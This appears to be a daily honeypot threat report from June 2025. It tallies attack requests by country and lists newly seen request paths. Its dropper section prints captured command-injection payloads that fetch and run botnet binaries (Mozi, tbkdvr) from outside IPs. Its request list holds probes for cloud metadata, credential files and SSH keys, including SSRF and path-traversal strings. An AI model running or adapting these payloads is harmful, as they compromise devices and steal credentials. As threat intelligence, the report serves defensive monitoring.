Table of Contents

Daily Report: 2025-06-13
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

Executive summary
OT report simplified
Botnet dropper behaviour
List of request
List of country_iso_code

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 478 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1956 requests were recorded during the day, originating from 6 different countries, with a peak of 888 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_country	targeted_country
IN	Israel
CN	Georgia

botnet_dropper_behaviour
#

remote_addr	request
141.98.11.83	GET /shell?cd+/tmp;iptables+-I+INPUT+-p+tcp+-s+141.98.11.147+–dport+5500+-j+ACCEPT;+iptables+-I+INPUT+-p+tcp+–dport+5500+-j+DROP;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/x86;chmod+777+;./x86+x86;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm7;chmod+777+;./arm7+arm7;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm4;chmod+777+;./arm4+arm4;cd+/tmp;rm+-rf+j;nohup+wget+http:/\x5C/94.26.90.251/arm5;chmod+777+;./arm5+arm5 HTTP/1.1
141.98.11.147	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3Bsh%20-c%20%22route%20add%20-host%20141.98.11.147%20reject%3B%20route%20add%20-host%20141.98.11.147%20gw%20141.98.11.147%22%3B%20wget%20http%3A%2F%2F94.26.90.251%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
117.193.140.221	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
122.97.212.198	27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
104.167.221.114	POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3B%20wget%20http%3A%2F%2F104.167.221.114%2Ftbkdvr.sh%3B%20chmod%20777%20tbkdvr.sh%3B%20sh%20tbkdvr.sh%3B%20tftp%20104.167.221.114%20-c%20get%20tbkdvr1.sh%3B%20chmod%20777%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20tftp%20-r%20tbkdvr2.sh%20-g%20104.167.221.114%3B%20chmod%20777%20tbkdvr2.sh%3B%20sh%20tbkdvr2.sh%3B%20ftpget%20-v%20-u%20anonymous%20-p%20anonymous%20-P%2021%20104.167.221.114%20tbkdvr1.sh%20tbkdvr1.sh%3B%20sh%20tbkdvr1.sh%3B%20rm%20-rf%20tbkdvr.sh%20tbkdvr1.sh%20tbkdvr2.sh%20tbkdvr1.sh HTTP/1.1
87.121.84.34	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://31.59.40.187/x/tplink+-O-

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

	number_of_occurence	request
72	4	GET /ssi.cgi/Login.htm HTTP/1.1
88	3	GET /v1.0/8888/sys.html?way=runway HTTP/1.1
152	1	GET /public/storage.json HTTP/1.1
153	1	GET /public/shell.php HTTP/1.1
154	1	GET /public/s3.json HTTP/1.1
157	1	GET /latest/meta-data HTTP/1.1
158	1	GET /latest/meta-data/iam/info HTTP/1.1
159	1	GET /latest/meta-data/iam/security-credentials/ HTTP/1.1
160	1	GET /latest/user-data HTTP/1.1
163	1	GET /login.bak.php HTTP/1.1
164	1	GET /login.old.php HTTP/1.1
167	1	GET /mail-config.php HTTP/1.1
169	1	GET /public/s3-bucket.json HTTP/1.1
170	1	GET /public/execute.php HTTP/1.1
171	1	GET /public/env.js HTTP/1.1
172	1	GET /public/db_dump.sql HTTP/1.1
176	1	GET /internal/proxy HTTP/1.1
177	1	GET /jenkins.yml HTTP/1.1
179	1	GET /js/api.js HTTP/1.1
184	1	GET /k8s/eks/credentials HTTP/1.1
185	1	GET /k8s/eks/secrets/aws HTTP/1.1
186	1	GET /k8s/eks/token.json HTTP/1.1
187	1	GET /k8s/metadata HTTP/1.1
188	1	GET /k8s/secrets/aws HTTP/1.1
189	1	GET /mailer_config.php HTTP/1.1
190	1	GET /k8s/secrets/iam HTTP/1.1
191	1	GET /keys/private.pem HTTP/1.1
192	1	GET /keys/public.pem HTTP/1.1
194	1	GET /kubernetes/eks/secrets.json HTTP/1.1
195	1	GET /kubernetes/metadata HTTP/1.1
198	1	GET /internal/api HTTP/1.1
200	1	GET /internal/aws/iam/keys.json HTTP/1.1
201	1	GET /public/uploads/s3-keys.json HTTP/1.1
202	1	GET /public/uploads/.s3cfg HTTP/1.1
203	1	GET /public/uploads/.bucket HTTP/1.1
204	1	GET /internal/aws/metadata.json HTTP/1.1
206	1	GET /metadata/instance/network/interface/0/ipv4/ipAddress/0/privateIpAddress HTTP/1.1
210	1	GET /metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress HTTP/1.1
214	1	GET /pg_dump.sql HTTP/1.1
218	1	GET /internal/aws/credentials HTTP/1.1
228	1	GET /mysqldump.sql HTTP/1.1
232	1	GET /old/config.json HTTP/1.1
235	1	GET /metadata/computeMetadata/v1 HTTP/1.1
236	1	GET /metadata/instance HTTP/1.1
237	1	GET /metadata/instance/compute/ HTTP/1.1
238	1	GET /metadata/instance/compute/location HTTP/1.1
239	1	GET /metadata/instance/compute/name HTTP/1.1
240	1	GET /metadata/instance/compute/plan HTTP/1.1
241	1	GET /metadata/instance/compute/platformFaultDomain HTTP/1.1
242	1	GET /public/db.sql HTTP/1.1
243	1	GET /metadata/instance/compute/resourceGroupName HTTP/1.1
244	1	GET /public/bucket.json HTTP/1.1
245	1	GET /metadata/instance/compute/subscriptionId HTTP/1.1
247	1	GET /public/backup.zip HTTP/1.1
248	1	GET /public/aws_secrets.json HTTP/1.1
249	1	GET /public/aws_keys.json HTTP/1.1
250	1	GET /metadata/instance/compute/vmId HTTP/1.1
251	1	GET /metadata/instance/compute/vmSize HTTP/1.1
252	1	GET /metadata/instance/compute/zone HTTP/1.1
253	1	GET /public/.s3cfg HTTP/1.1
255	1	GET /public/.aws/secrets.json HTTP/1.1
256	1	GET /public/.aws/credentials HTTP/1.1
257	1	GET /public/.aws/config HTTP/1.1
260	1	GET /metadata/instance/network/interface/0/ipv4/ipAddress/0/ HTTP/1.1
261	1	GET /metadata/instance/compute/tags HTTP/1.1
267	1	GET /data/aws/credentials HTTP/1.1
268	1	GET /database.bak HTTP/1.1
271	1	GET /db.dump HTTP/1.1
274	1	GET /rce.php HTTP/1.1
278	1	GET /debug/pprof HTTP/1.1
279	1	GET /debug?target=http://169.254.169.254/latest/meta-data/ HTTP/1.1
281	1	GET /dev/backup.zip HTTP/1.1
282	1	GET /dev/db.sql HTTP/1.1
283	1	GET /dev/execute.php HTTP/1.1
284	1	GET /dev/shell.php HTTP/1.1
288	1	GET /db_backup.dump HTTP/1.1
292	1	GET /config/dev.json HTTP/1.1
295	1	GET /config/mailer.php HTTP/1.1
296	1	GET /config/parameters.json HTTP/1.1
299	1	GET /config/sendinblue.php HTTP/1.1
312	1	GET /console.php HTTP/1.1
317	1	GET /graphql/dev HTTP/1.1
318	1	GET /graphql/playground HTTP/1.1
320	1	GET /graphql/test HTTP/1.1
321	1	GET /graphql?query={__schema{queryType{name}}} HTTP/1.1
322	1	GET /graphql?query={__schema{types{name,fields{name}}}} HTTP/1.1
327	1	GET /hidden/.aws/config HTTP/1.1
328	1	GET /hidden/.aws/credentials HTTP/1.1
329	1	GET /hidden/.env HTTP/1.1
333	1	GET /index.bak.php HTTP/1.1
335	1	GET /index.old.php HTTP/1.1
338	1	GET /internal-api/aws/credentials HTTP/1.1
339	1	GET /internal-api/aws/iam HTTP/1.1
340	1	GET /internal-api/aws/metadata HTTP/1.1
341	1	GET /internal-api/iam/credentials HTTP/1.1
342	1	GET /internal/169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1
343	1	GET /internal/admin?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
344	1	GET /hidden/aws_keys.json HTTP/1.1
351	1	GET /ecs/task-credentials HTTP/1.1
352	1	GET /ecs/task-credentials.json HTTP/1.1
353	1	GET /eks/metadata HTTP/1.1
354	1	GET /eks/secrets/iam HTTP/1.1
355	1	GET /email.json HTTP/1.1
356	1	GET /email/credentials.json HTTP/1.1
357	1	GET /email/smtp_config.json HTTP/1.1
358	1	GET /graphql/console HTTP/1.1
360	1	GET /env.zip HTTP/1.1
363	1	GET /execute.php HTTP/1.1
364	1	GET /frontend/js/env.js HTTP/1.1
370	1	GET /graphql-explorer HTTP/1.1
371	1	GET /graphql/api HTTP/1.1
400	1	GET /vendor/.aws/secrets.json HTTP/1.1
402	1	GET /vendor/aws/.env HTTP/1.1
403	1	GET /vendor/aws/config HTTP/1.1
404	1	GET /vendor/aws/credentials HTTP/1.1
405	1	GET /vendor/aws/keys.json HTTP/1.1
406	1	GET /vendor/aws/secrets.json HTTP/1.1
448	1	HEAD /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.1
449	1	GET /G7mq HTTP/1.1
450	1	GET /cCGp HTTP/1.1
464	1	GET /socket.io/1/?t=1749787818686 HTTP/1.1
465	1	GET /socket.io/1/?t=1749787836043 HTTP/1.1
466	1	GET /socket.io/1/?t=1749787845354 HTTP/1.1
485	1	GET /sendgrid.config.js HTTP/1.1
488	1	GET /sendgrid.key HTTP/1.1
489	1	GET /sendgrid.php HTTP/1.1
490	1	GET /sendinblue.env HTTP/1.1
491	1	GET /sendinblue.json HTTP/1.1
496	1	GET /vendor/.aws/keys.json HTTP/1.1
498	1	GET /ses.json HTTP/1.1
499	1	GET /ses/keys.json HTTP/1.1
500	1	GET /ses_config.php HTTP/1.1
502	1	GET /settings HTTP/1.1
511	1	GET /run.php HTTP/1.1
512	1	GET /s3-access.json HTTP/1.1
513	1	GET /s3-bucket-list.json HTTP/1.1
514	1	GET /s3-bucket.json HTTP/1.1
515	1	GET /s3-credentials.bak HTTP/1.1
516	1	GET /s3-credentials.json HTTP/1.1
518	1	GET /s3/.aws HTTP/1.1
519	1	GET /s3/.aws/config HTTP/1.1
520	1	GET /s3/.aws/config.json HTTP/1.1
521	1	GET /s3/.aws/credentials HTTP/1.1
522	1	GET /s3/.env HTTP/1.1
523	1	GET /s3/.env.bak HTTP/1.1
524	1	GET /secrets/secret.key HTTP/1.1
525	1	GET /s3/keys.json HTTP/1.1
526	1	GET /s3/presigned HTTP/1.1
527	1	GET /s3/presigned-links HTTP/1.1
528	1	GET /s3/presigned-url HTTP/1.1
529	1	GET /s3/presigned-urls HTTP/1.1
530	1	GET /s3/public/credentials HTTP/1.1
531	1	GET /s3/public/keys HTTP/1.1
538	1	GET /s3/config.json HTTP/1.1
540	1	GET /test/backup.zip HTTP/1.1
541	1	GET /test/db.sql HTTP/1.1
542	1	GET /test/execute.php HTTP/1.1
543	1	GET /test/shell.php HTTP/1.1
544	1	GET /test?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
545	1	GET /tmp/.aws/config HTTP/1.1
546	1	GET /tmp/.aws/credentials HTTP/1.1
547	1	GET /tmp/.aws/keys.json HTTP/1.1
548	1	GET /tmp/.aws/secrets.json HTTP/1.1
550	1	GET /tmp/aws_keys.json HTTP/1.1
551	1	GET /tmp/aws_secrets.json HTTP/1.1
553	1	GET /tmp/db.sql HTTP/1.1
554	1	GET /tmp/db_dump.sql HTTP/1.1
556	1	GET /tmp/execute.php HTTP/1.1
557	1	GET /tmp/shell.php HTTP/1.1
562	1	GET /vault/.env HTTP/1.1
563	1	GET /vendor/.aws HTTP/1.1
564	1	GET /vendor/.aws/config HTTP/1.1
565	1	GET /vendor/.aws/credentials HTTP/1.1
566	1	GET /tmp/backup.zip HTTP/1.1
568	1	GET /site.tar.gz HTTP/1.1
570	1	GET /site_backup.zip HTTP/1.1
574	1	GET /smtp/backup.json HTTP/1.1
575	1	GET /smtp/keys.json HTTP/1.1
576	1	GET /smtp/private.json HTTP/1.1
577	1	GET /smtp_config.js HTTP/1.1
578	1	GET /source_code.zip HTTP/1.1
581	1	GET /ssh/id_rsa.pub HTTP/1.1
582	1	GET /ssl/cert.pem HTTP/1.1
583	1	GET /ssl/private.key HTTP/1.1
587	1	GET /storage/oauth-private.key HTTP/1.1
588	1	GET /storage/oauth-public.key HTTP/1.1
592	1	GET /terminal.php HTTP/1.1
593	1	GET /terraform/.env HTTP/1.1
594	1	GET /ssh/id_rsa HTTP/1.1
595	1	GET /.env.staging.json HTTP/1.1
596	1	GET /.env.zip HTTP/1.1
599	1	GET /.git/COMMIT_EDITMSG HTTP/1.1
600	1	GET /.git/FETCH_HEAD HTTP/1.1
601	1	GET /.git/ORIG_HEAD HTTP/1.1
602	1	GET /.git/backup HTTP/1.1
603	1	GET /.git/config.bak HTTP/1.1
604	1	GET /.git/config.old HTTP/1.1
605	1	GET /.git/config~ HTTP/1.1
606	1	GET /.git/db.sql HTTP/1.1
607	1	GET /.git/description HTTP/1.1
608	1	GET /.git/dump.sql HTTP/1.1
609	1	GET /.git/execute.php HTTP/1.1
611	1	GET /.git/hooks/pre-commit HTTP/1.1
612	1	GET /.git/hooks/pre-push HTTP/1.1
615	1	GET /.git/logs/refs/heads/master HTTP/1.1
616	1	GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1
621	1	GET /.git/refs/heads/main HTTP/1.1
622	1	GET /.git/refs/heads/master HTTP/1.1
624	1	GET /.git/refs/remotes/origin/main HTTP/1.1
625	1	GET /.git/refs/remotes/origin/master HTTP/1.1
626	1	GET /.git/hooks/post-commit HTTP/1.1
627	1	GET /.config.js HTTP/1.1
628	1	GET /.database HTTP/1.1
629	1	GET /.database.bak HTTP/1.1
630	1	GET /.database.sql HTTP/1.1
631	1	GET /.database.tar.gz HTTP/1.1
632	1	GET /.db_backup HTTP/1.1
633	1	GET /.db_backup.sql HTTP/1.1
634	1	GET /.db_backup.tar HTTP/1.1
635	1	GET /.db_backup.tar.gz HTTP/1.1
636	1	GET /.dockerenv HTTP/1.1
637	1	GET /.dump HTTP/1.1
638	1	GET /.dump.sql HTTP/1.1
639	1	GET /.dump.tar HTTP/1.1
640	1	GET /.dump.tar.gz HTTP/1.1
644	1	GET /.env.dev.json HTTP/1.1
649	1	GET /.env.local.json HTTP/1.1
652	1	GET /.env.prod.json HTTP/1.1
659	1	GET /169.254.169.254/latest/meta-data/iam/ HTTP/1.1
660	1	GET /169.254.169.254/latest/meta-data/iam/info/ HTTP/1.1
661	1	GET /169.254.169.254/latest/meta-data/iam/security-credentials/ HTTP/1.1
662	1	GET /169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanstalk-ec2-role HTTP/1.1
663	1	GET /169.254.169.254/latest/meta-data/iam/security-credentials/aws-sdk-credentials/ HTTP/1.1
664	1	GET /169.254.169.254/latest/meta-data/iam/security-credentials/ec2-instance-role HTTP/1.1
665	1	GET /169.254.169.254/latest/meta-data/iam/security-credentials/ecsTaskExecutionRole/ HTTP/1.1
666	1	GET /169.254.169.254/latest/meta-data/instance-id HTTP/1.1
667	1	GET /169.254.169.254/latest/meta-data/instance-type HTTP/1.1
668	1	GET /169.254.169.254/latest/meta-data/local-ipv4 HTTP/1.1
669	1	GET /169.254.169.254/latest/meta-data/network/interfaces/macs/ HTTP/1.1
670	1	GET /169.254.169.254/latest/meta-data/network/interfaces/macs/mac/ HTTP/1.1
671	1	GET /169.254.169.254/latest/meta-data/network/interfaces/macs/mac/subnet-id HTTP/1.1
672	1	GET /169.254.169.254/latest/meta-data/network/interfaces/macs/mac/vpc-id HTTP/1.1
673	1	GET /169.254.169.254/latest/meta-data/placement/ HTTP/1.1
674	1	GET /.git/refs/stash HTTP/1.1
675	1	GET /169.254.169.254/latest/meta-data/public-hostname HTTP/1.1
676	1	GET /169.254.169.254/latest/meta-data/public-ipv4 HTTP/1.1
677	1	GET /169.254.169.254/latest/user-data HTTP/1.1
678	1	GET /169.254.170.2/latest/meta-data/ HTTP/1.1
679	1	GET /169.254.170.2/latest/meta-data/iam/security-credentials/ HTTP/1.1
680	1	GET /169.254.170.2/v2/credentials/ HTTP/1.1
681	1	GET /169.254.170.2/v2/credentials/container-role HTTP/1.1
682	1	GET /169.254.170.2/v2/credentials/ecsTaskExecutionRole HTTP/1.1
683	1	GET /169.254.170.2/v2/metadata/ HTTP/1.1
690	1	GET /169.254.169.254/latest/meta-data/placement/availability-zone HTTP/1.1
692	1	GET /.git/shell.php HTTP/1.1
694	1	GET /.github/workflows/build.yml HTTP/1.1
695	1	GET /.github/workflows/deploy.yml HTTP/1.1
697	1	GET /.gitkeep HTTP/1.1
699	1	GET /.hg/hgrc HTTP/1.1
703	1	GET /.s3/config.json HTTP/1.1
704	1	GET /.s3/keys.json HTTP/1.1
705	1	GET /.s3/secrets.json HTTP/1.1
706	1	GET /169.254.169.254/latest/meta-data/hostname HTTP/1.1
707	1	GET /.s3cfg.bak HTTP/1.1
708	1	GET /.s3cfg.old HTTP/1.1
709	1	GET /.s3cfg~ HTTP/1.1
710	1	GET /.settings.json HTTP/1.1
711	1	GET /.smtp-credentials HTTP/1.1
712	1	GET /.smtp.json HTTP/1.1
716	1	GET /.well-known/assetlinks.json HTTP/1.1
717	1	GET /.well-known/aws.json HTTP/1.1
718	1	GET /.well-known/credentials.json HTTP/1.1
719	1	GET /.yarnrc HTTP/1.1
720	1	GET /169.254.169.254/latest/meta-data/ HTTP/1.1
721	1	GET /169.254.169.254/latest/meta-data/ami-id HTTP/1.1
738	1	GET /.cloudfront/secrets.json HTTP/1.1
787	1	GET /.aws_secrets.json HTTP/1.1
794	1	GET /.cpanel/caches/config/.env HTTP/1.1
796	1	GET /.db_credentials HTTP/1.1
797	1	GET /mysql/.my.cnf HTTP/1.1
798	1	GET /.mysql_history HTTP/1.1
799	1	GET /.pgpass HTTP/1.1
800	1	GET /.history HTTP/1.1
802	1	HEAD /modpack/CrazyTownS3.zip HTTP/1.1
805	1	GET /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000 HTTP/1.1
806	1	GET /admin/config?cmd=cat+/root/.aws/credentials HTTP/1.1
807	1	GET /.backup HTTP/1.1
808	1	GET /.backup.sql HTTP/1.1
809	1	GET /.backup.tar HTTP/1.1
810	1	GET /.backup.tar.gz HTTP/1.1
811	1	GET /.backup.zip HTTP/1.1
812	1	GET /.backup/db.sql HTTP/1.1
813	1	GET /.backup/mysql.sql HTTP/1.1
814	1	GET /.backup/pgsql.dump HTTP/1.1
816	1	GET /.cloudfront/config.json HTTP/1.1
817	1	GET /.cloudfront/keys.json HTTP/1.1
818	1	GET /.zsh_history HTTP/1.1
834	1	GET /.aws_secrets.js HTTP/1.1
835	1	GET /.aws/ecs-task-credentials.json HTTP/1.1
836	1	GET /.aws/metadata HTTP/1.1
837	1	GET /.aws/metadata/iam HTTP/1.1
838	1	GET /.aws/metadata/iam/security-credentials/ HTTP/1.1
839	1	GET /.aws/s3/keys HTTP/1.1
840	1	GET /.aws/s3/secrets HTTP/1.1
841	1	GET /.aws/s3/tokens HTTP/1.1
842	1	GET /.aws_config.js HTTP/1.1
843	1	GET /.aws_creds.json HTTP/1.1
844	1	GET /.aws_keys.json HTTP/1.1
845	1	GET /.aws_lambda HTTP/1.1
846	1	GET /.aws_lambda/config.json HTTP/1.1
847	1	GET /.aws_lambda/handler.js HTTP/1.1
848	1	GET /.aws_lambda/secrets.json HTTP/1.1
849	1	GET /.aws_lambda/token.json HTTP/1.1
850	1	GET /.aws/ecs-task-credentials HTTP/1.1
851	1	GET /aws/iam/role-chain.json HTTP/1.1
852	1	GET /aws/iam/secrets.json HTTP/1.1
853	1	GET /aws/iam/temp-creds.json HTTP/1.1
854	1	GET /aws/iam/temp-keys HTTP/1.1
855	1	GET /aws/iam/temporary-credentials HTTP/1.1
856	1	GET /aws/iam/temporary.json HTTP/1.1
857	1	GET /aws/keys_backup.json HTTP/1.1
858	1	GET /aws/lambda/config.json HTTP/1.1
859	1	GET /aws/lambda/secrets.json HTTP/1.1
861	1	GET /aws/metadata.json HTTP/1.1
862	1	GET /aws/metadata/iam HTTP/1.1
863	1	GET /aws/metadata/iam/security-credentials HTTP/1.1
864	1	GET /aws/metadata/iam/security-credentials/ HTTP/1.1
865	1	GET /aws/s3/.env HTTP/1.1
867	1	GET /aws/s3/credentials.bak HTTP/1.1
868	1	GET /aws/s3/credentials.json HTTP/1.1
869	1	GET /aws/s3/credentials.yml HTTP/1.1
870	1	GET /aws/s3/keys.json HTTP/1.1
871	1	GET /aws/s3/private.json HTTP/1.1
872	1	GET /aws/s3/public-bucket.json HTTP/1.1
873	1	GET /aws/s3/public-buckets.json HTTP/1.1
874	1	GET /aws/s3/public.json HTTP/1.1
875	1	GET /aws/s3/secrets.json HTTP/1.1
876	1	GET /aws/s3/tokens.json HTTP/1.1
877	1	GET /aws/s3/tokens.yml HTTP/1.1
878	1	GET /aws/ses.json HTTP/1.1
879	1	GET /aws/ses_smtp.json HTTP/1.1
880	1	GET /aws/sts/config.json HTTP/1.1
881	1	GET /aws/sts/secrets.json HTTP/1.1
882	1	GET /aws/s3/config.json HTTP/1.1
887	1	GET /aws/.env.prod HTTP/1.1
888	1	GET /aws/.env.ses HTTP/1.1
889	1	GET /aws/api-gateway.json HTTP/1.1
890	1	GET /aws/api-gateway/config.json HTTP/1.1
891	1	GET /aws/api-gateway/keys.json HTTP/1.1
892	1	GET /aws/api-gateway/openapi.json HTTP/1.1
893	1	GET /aws/api-gateway/secrets.json HTTP/1.1
894	1	GET /aws/api-gateway/swagger.json HTTP/1.1
895	1	GET /aws/api-gateway/tokens.json HTTP/1.1
896	1	GET /aws/cloudfront/config.json HTTP/1.1
897	1	GET /aws/cloudfront/secrets.json HTTP/1.1
898	1	GET /aws/iam/role-assume HTTP/1.1
899	1	GET /aws/cognito/secrets.json HTTP/1.1
900	1	GET /aws/cognito/token.json HTTP/1.1
901	1	GET /aws/config.ini HTTP/1.1
904	1	GET /aws/ecs/task-credentials HTTP/1.1
905	1	GET /aws/ecs/task-credentials.json HTTP/1.1
906	1	GET /aws/eks/config.json HTTP/1.1
907	1	GET /aws/eks/secrets.json HTTP/1.1
908	1	GET /aws/env_vars.txt HTTP/1.1
909	1	GET /aws/iam/assume-role.json HTTP/1.1
910	1	GET /aws/iam/config.json HTTP/1.1
911	1	GET /aws/iam/credentials.json HTTP/1.1
912	1	GET /aws/iam/ecs-task-credentials.json HTTP/1.1
913	1	GET /aws/iam/keys.json HTTP/1.1
914	1	GET /aws/cognito/config.json HTTP/1.1
918	1	GET /cloud HTTP/1.1
920	1	GET /cloudfront/api-keys.json HTTP/1.1
921	1	GET /cloudfront/config.json HTTP/1.1
922	1	GET /cloudfront/keys.json HTTP/1.1
923	1	GET /cloudfront/secrets.json HTTP/1.1
924	1	GET /command.php HTTP/1.1
927	1	GET /computeMetadata/v1 HTTP/1.1
928	1	GET /computeMetadata/v1beta1 HTTP/1.1
930	1	GET /aws/token.json HTTP/1.1
937	1	GET /config/.htaccess HTTP/1.1
938	1	GET /config/.htpasswd HTTP/1.1
948	1	GET /aws_credentials.txt HTTP/1.1
949	1	GET /aws_creds.js HTTP/1.1
952	1	GET /aws_lambda/config.json HTTP/1.1
953	1	GET /aws_lambda/handler.js HTTP/1.1
954	1	GET /aws_lambda/secrets.json HTTP/1.1
955	1	GET /aws_lambda/token.json HTTP/1.1
956	1	GET /aws_secret.txt HTTP/1.1
957	1	GET /aws_secrets.js HTTP/1.1
958	1	GET /aws_secrets.json HTTP/1.1
959	1	GET /aws_smtp.json HTTP/1.1
962	1	GET /beta/shell.php HTTP/1.1
966	1	GET /backup.bak HTTP/1.1
972	1	GET /backup_old.zip HTTP/1.1
974	1	GET /bash.php HTTP/1.1
975	1	GET /beta/backup.zip HTTP/1.1
976	1	GET /beta/db.sql HTTP/1.1
977	1	GET /beta/execute.php HTTP/1.1
979	1	GET /api-gateway/.env.dev HTTP/1.1
980	1	GET /api-gateway/.env.local HTTP/1.1
981	1	GET /api-gateway/.env.production HTTP/1.1
982	1	GET /api-gateway/.env.staging HTTP/1.1
983	1	GET /api-gateway/config.json HTTP/1.1
984	1	GET /api-gateway/config.yaml HTTP/1.1
985	1	GET /api-gateway/config.yml HTTP/1.1
986	1	GET /api-gateway/dev/swagger.json HTTP/1.1
987	1	GET /api-gateway/keys.json HTTP/1.1
988	1	GET /api-gateway/openapi.json HTTP/1.1
989	1	GET /api-gateway/production/swagger.json HTTP/1.1
990	1	GET /api-gateway/secrets.json HTTP/1.1
991	1	GET /api-gateway/staging/swagger.json HTTP/1.1
992	1	GET /api-gateway/swagger.json HTTP/1.1
993	1	GET /api-gateway/v1/openapi.json HTTP/1.1
995	1	GET /api-gateway/v2/openapi.json HTTP/1.1
996	1	GET /api-gateway/v2/swagger.json HTTP/1.1
999	1	GET /api/aws/api-gateway HTTP/1.1
1000	1	GET /api/aws/cloudfront HTTP/1.1
1001	1	GET /api/aws/cognito HTTP/1.1
1002	1	GET /api/aws/credentials HTTP/1.1
1003	1	GET /api/aws/iam HTTP/1.1
1004	1	GET /api/aws/keys HTTP/1.1
1005	1	GET /api/aws/lambda HTTP/1.1
1006	1	GET /api/aws/s3 HTTP/1.1
1007	1	GET /api/aws/ses HTTP/1.1
1008	1	GET /api/aws/sns HTTP/1.1
1009	1	GET /api/aws/token HTTP/1.1
1010	1	GET /api-gateway/v1/swagger.json HTTP/1.1
1012	1	GET /admin/api/graphql HTTP/1.1
1013	1	GET /admin/command.php HTTP/1.1
1017	1	GET /admin/db.php HTTP/1.1
1018	1	GET /admin/db.sql HTTP/1.1
1019	1	GET /admin/db_dump.php HTTP/1.1
1022	1	GET /admin/debug?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
1023	1	GET /admin/execute.php HTTP/1.1
1024	1	GET /admin/graphql HTTP/1.1
1025	1	GET /admin/graphql/explore HTTP/1.1
1026	1	GET /api-gateway/.env.bak HTTP/1.1
1030	1	GET /admin/rce.php HTTP/1.1
1031	1	GET /admin/run.php HTTP/1.1
1032	1	GET /admin/secret HTTP/1.1
1034	1	GET /admin/shell.php HTTP/1.1
1035	1	GET /admin/terminal.php HTTP/1.1
1038	1	GET /admin/test?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
1039	1	GET /ansible/.env HTTP/1.1
1041	1	GET /api-gateway/.env HTTP/1.1
1042	1	GET /admin/internal/api HTTP/1.1
1043	1	GET /api/token.json HTTP/1.1
1045	1	GET /api/v1/auth HTTP/1.1
1046	1	GET /api/v1/aws/credentials HTTP/1.1
1047	1	GET /api/v1/aws/keys HTTP/1.1
1048	1	GET /api/v1/aws/token HTTP/1.1
1049	1	GET /api/v1/credentials HTTP/1.1
1050	1	GET /api/v1/keys HTTP/1.1
1051	1	GET /api/v1/me HTTP/1.1
1052	1	GET /api/v1/proxy HTTP/1.1
1053	1	GET /api/v1/proxy?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
1054	1	GET /api/v1/token HTTP/1.1
1056	1	GET /api/v2/proxy HTTP/1.1
1058	1	GET /api/backup.zip HTTP/1.1
1068	1	GET /artisan HTTP/1.1
1069	1	GET /assets/js/env.js HTTP/1.1
1071	1	GET /aws-admin?target=http://169.254.169.254/latest/meta-data/ HTTP/1.1
1072	1	GET /aws-api?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
1075	1	GET /api/bash HTTP/1.1
1076	1	GET /api/command HTTP/1.1
1080	1	GET /api/db.sql HTTP/1.1
1081	1	GET /api/db_backup.sql HTTP/1.1
1082	1	GET /api/db_dump.php HTTP/1.1
1085	1	GET /api/debug?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
1086	1	GET /api/execute HTTP/1.1
1087	1	GET /api/execute.php HTTP/1.1
1089	1	GET /api/healthz HTTP/1.1
1091	1	GET /api/internal-aws?url=http://169.254.169.254/latest/meta-data/ HTTP/1.1
1092	1	GET /api/key HTTP/1.1
1093	1	GET /api/key.json HTTP/1.1
1097	1	GET /api/rce HTTP/1.1
1103	1	GET /api/shell.php HTTP/1.1
1106	1	GET /api/init.php HTTP/1.1

country_iso_code
#

	number_of_occurence	country_iso_code
0	888	GB
1	281	US
2	108	CN
3	103	IN
4	95	JP
5	79	HK
6	75	NL
7	48	BG
8	45	TW
9	35	LT
10	33	DE
11	24	PL
12	14	SG
13	13	CA
14	13	AU
15	12	BA
16	12	SC
17	8	FR
18	8	PT
19	8	GH
20	8	BE
21	6	IL
22	4	TH
23	4	TM
24	4	AO
25	3	ES
26	3	ZA
27	3	RU
28	3	KZ
29	2	UA
30	2	NG
31	2	KR
32	2	IR
33	2	VN
34	2	IE
35	1	PK
36	1	ID
37	1	GE
38	1	FI

Report: 2025-06-12

12 June 2025·339 words

Repport Daily

Report: 2025-06-11

11 June 2025·309 words

Repport Daily

Report: 2025-06-10

10 June 2025·335 words

Repport Daily

	number_of_occurence	country_iso_code
0	888	GB
1	281	US
2	108	CN
3	103	IN
4	95	JP
5	79	HK
6	75	NL
7	48	BG
8	45	TW
9	35	LT
10	33	DE
11	24	PL
12	14	SG
13	13	CA
14	13	AU
15	12	BA
16	12	SC
17	8	FR
18	8	PT
19	8	GH
20	8	BE
21	6	IL
